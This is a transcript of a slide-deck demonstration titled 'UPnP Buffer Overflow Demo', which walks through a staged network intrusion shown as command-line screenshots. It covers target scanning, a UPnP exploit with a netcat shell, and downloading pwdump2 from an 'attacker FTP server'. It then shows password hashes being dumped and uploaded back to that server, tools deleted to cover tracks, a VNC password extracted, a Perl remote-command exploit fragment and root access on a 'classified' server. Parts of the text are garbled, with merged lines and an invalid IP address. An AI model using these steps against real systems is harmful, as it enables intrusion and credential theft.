upnp buffer overflow demo this is a true story …of what could happen
TRANSCRIPT
![Page 1: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/1.jpg)
UPnP Buffer Overflow UPnP Buffer Overflow DemoDemo
![Page 2: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/2.jpg)
This is a True Story…of what could happen
![Page 3: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/3.jpg)
Identify Target
![Page 4: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/4.jpg)
rri-usa.org IP:208.247.65.240
X
![Page 5: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/5.jpg)
goliath.rri-usa.org: target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.240: yesdavid.rri-usa.org: target systems; Coffey, Brian; Ward, Joanne;;216.92.195.219; yesarmaggedon.rri-usa.org: target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.192; yesmoneymaker.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.224; yesDNS;198.6.1.65; DNS 198.6.1.182;;Yesbeast.rri-usa.org:target systems;Fish, Bob; Duck, Wayne;; 208.247.65.256; yesmaster.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nogladiator.rri-usa.org:target systems; Riandi Grant; Charles Robert;; 208.247.65.248; nowatcher.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nocover.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nojohnson.rri-usa.org:target systems; Charles Robert;Horace Oliver;; 208.247.65.248; nonighthawk.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; noharper.rri-usa.org:target systems; Riandi Grant; Charles Robert;; 208.247.65.248; noinsider.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nojumper.rri-usa.org:Riandi Grant; Charles Robert; Horace Oliver;; 216.92.195.65; no
identify target
___
___
___C:\>_
![Page 6: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/6.jpg)
Scope Target Topology
![Page 7: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/7.jpg)
Microsoft Windows 2000 [Version 4.3.2800](C) Copyright 1985-2001 Microsoft Corp.
C:\>
Tracing route to 216.92.195.219 over a maximum of 30 hops
1 7 ms 6 ms 7 ms 10.105.0.1 2 11 ms 7 ms 7 ms 24.95.225.193 3 7 ms 7 ms 8 ms 24.95.225.13 4 13 ms 11 ms 12 ms 24.95.224.49 5 17 ms 17 ms 18 ms 66.185.136.173 6 16 ms 17 ms 18 ms 66.185.136.164 7 36 ms 35 ms 36 ms 66.185.152.245 8 52 ms 52 ms 51 ms 66.185.152.200 9 52 ms 52 ms 64 ms 66.185.151.67 10 53 ms 59 ms 52 ms 213.248.82.217 11 170 ms 175 ms 170 ms 213.248.103.254 12 170 ms 173 ms 182 ms 172.24.3.22 13 184 ms 184 ms 185 ms 62.84.135.98 14 183 ms 180 ms 180 ms 216.92.195.219 Trace complete.
C:\>
tracert -d 216.92.195.219_
_
![Page 8: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/8.jpg)
Map Open Services
![Page 9: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/9.jpg)
Microsoft Windows 2000 [Version 4.3.2800](C) Copyright 1985-2001 Microsoft Corp.
C:\>Starting nmap V. 2.2-BETA4 by Fyodor ([email protected], www.insecure.org/nmap/)Host (216.92.195.219) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.Interesting ports on rri-usa.org (216.92.195.219):PortState Protocol Service22 open tcp ssh111 open tcp sunrpc135 open tcp loc-srv139 open tcp netbios-ssn445 open tcp microsoft-ds515 open tcp printer540 open tcp uucp587 open tcp submission901 open tcp samba-swat1521open tcp ncube-lm1522open tcp rna-lm1528open tcp mciautoreg5000open tcp fics6000open tcp X116112open tcp dtspc7100open tcp font-serviceTCP Sequence Prediction: Class=random positive increments
Difficulty=3916950 (Worthy Challenge!)Remote operating system guess:Nmap run completed – 256 IP addresses (2 hosts up) scanned in 13 secondsC:\>
_nmap -0 –sS rri-usa.org/24
Microsoft Windows 2000 [Version 5.1.2600]
_
![Page 10: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/10.jpg)
Compromise Host
UPnP Buffer Overflow
![Page 11: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/11.jpg)
Microsoft Windows 2000 [Version 4.3.2800](C) Copyright 1985-2001 Microsoft Corp.
C:\> _cd ..\XPloit 216.92.195.219 -e _cd .\nc 216.92.195.219 7788
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
x
C:\Documents and Settings\user> _
X
![Page 12: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/12.jpg)
Upload pwdump2
![Page 13: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/13.jpg)
C:\Documents and Settings\user>_ftp
ftp> open_
To 67.8.205.154_
Connected to 67.8.205.154220 attacker FTP server (Windows 2000) ready.User (67.8.205.154:(none)):_tgillette
331 Password required for tgillette.Password:
_********230 User tgillette logged in.ftp> cd exploits _
200 PORT command successful.
ftp> _ls
200 PORT command successful.150 ASCII data connection for /bin/ls (67.8.205.154,3584) (0 bytes).pwdump2.exesamdump.dll226 ASCII Transfer complete.ftp: 10 bytes received in 0.00Seconds 10000.00Kbytes/sec.
![Page 14: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/14.jpg)
200 PORT command successful.150 ASCII data connection for pwdump2.exe (67.8.205.154,3585) (17 kbytes).150 ASCII data connection for samdump.dll (67.8.205.154,3585) (14 kbytes).226 ASCII Transfer complete.ftp: 31 kbytes received in 0.86Seconds 4000.00Kbytes/sec.
get pwdump2.exe samdump.dll ..\system32\configftp> __
ftp> _bye221 Goodbye
X
C:\Documents and Settings\user> _
![Page 15: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/15.jpg)
Get the Password File
![Page 16: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/16.jpg)
C:\Documents and Settings\user>_cd C:\
C:\> _C:\pwdump2 > password.txtC:\> _ftpftp>_openTo _67.8.205.154Connected to 67.8.205.154220 attacker FTP server (Windows 2000) ready.User (67.8.205.154:(none)): _tgillette331 Password required for tgillette.Password:
_********230 User tgillette logged in.ftp> _putLocal file _..\password.txt
Remote file _...\passwords
200 PORT command successful.150 ASCII data connection for …\passwords (67.8.205.154,3614).226 Transfer complete.ftp: 80 Kbytes sent in 0.02Seconds 4000.00Kbytes/sec.ftp> _bye221 Goodbye
C:\> _cd C:\WINDOWS\system32\configC:\WINDOWS\system32\config> _del pwdump2.exe samdump.dll passwd.txtC:\> _exit
X
![Page 17: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/17.jpg)
Decrypt Password File
![Page 18: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/18.jpg)
Administrator = J0hNnyUtaH
![Page 19: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/19.jpg)
Compromise Perimeter Host
![Page 20: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/20.jpg)
perl ~roelof/tools/fw1/sr.pl 196.33.86.8
196.33.88.57 S [ms01-023] {.printer} www.microsoft.com/Downloads/Release.asp?ReleaseID=29321
PING 63.77.125.1 (62.77.125.1): 56 data bytes36 bytes from rri-usa.org (156.131.72.1943: Time to live exceeded
H:\>net view \\62.77.121.36Shared resources at \\ 62.77.121.36
H:\>net use t: \\62.77.121.36 \d_drive /USER:tadmin *Type the password for \\63.76.122.41\d_drive: [tadmin]The command completed successfully.
compromise perimeter host
___
___
___C:\> _
![Page 21: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/21.jpg)
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default] "AutoPortSelect"=dword:00000001 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000000a [HKEY_LOCAL_MACHINE\SOFTWARE\Policies] [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca] [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca\Certificates] \SOFTWARE\Policies\Microsoft\SystemCertificates\EFS] "EFSBlob"=hex:01,00,01,00,01,00,00,00,78,02,00,00,74,02,00,00,1c,00,00,00,02,\
38,30,82,01,a5,a0,03,02,01,02,02,0f,93,ee,46,14,ad,93,8c,4e,1f,6f,b0,a2,84,\ e8,31,30,09,06,05,2b,0e,03,02,1d,05,00,30,50,31,16,30,14,06,0345,46,53,31,28,30,26,06,03,55,04,0b,13,1f,45,46,53,20,46,69,6c,65
extract encrypted password
___
___
"Password"=hex:61,f5,ec,5e,80,f5,c9,92
___
C:\>_
![Page 22: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/22.jpg)
End Game:Compromise Classified
Server
![Page 23: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/23.jpg)
C:\>x4 -W61f5ec5e80f5c992Entered HEX String: 61 f5 ec 5e 80 f5 c9 92Access Password: s3cr3t
decrypt classified UNIX access password
___
___
___
C:\>_
![Page 24: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/24.jpg)
# ------------ we can assume that the cmd.exe is copied from y $path;($dummy,$path)=split(/:/,$thedir);$path =~ s/\\/\//g;$runi="/".$unidir."/sensepost.exe?/c";$thecommand=~s/ /%20/g;@results=sendraw("GET $runi+$thecommand HTTP/1.0\r\n\r\n");foreach $line (@results){ if ($line =~ /denied/) {die "sorry, access denied\n";}print @results;sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in=""; select(S); $|=1; print $pstr; while(<S>) { push @in,$_; last if ($line=~ /^[\r\n]+$/ );} select(STDOUT); return @in; } else { die("connect problems\n"); }
exploit internal host
___
___
___
$ _
![Page 25: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/25.jpg)
#> rlogin -l root tgtsunprod2Last login: Tue Jul 3 14:52:41 from tgtsunprod1Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning Government Classified Server ***You have mail.tgtsunprod2 #/usr/sbin/ifconfig -aulo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255 ether 8:0:20:f7:d0:78dhsunprod2 #uname -aSunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80tgtsunprod2 #id
final target compromised
______
___
uid=0(root) gid=1(other)
$ _
X
![Page 26: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/26.jpg)
All your base are belong to
us...
![Page 27: UPnP Buffer Overflow Demo This is a True Story …of what could happen](https://reader033.vdocument.in/reader033/viewer/2022052913/5697bff11a28abf838cbb299/html5/thumbnails/27.jpg)
…all your base? Bad english..
or something more sinister?
SKIP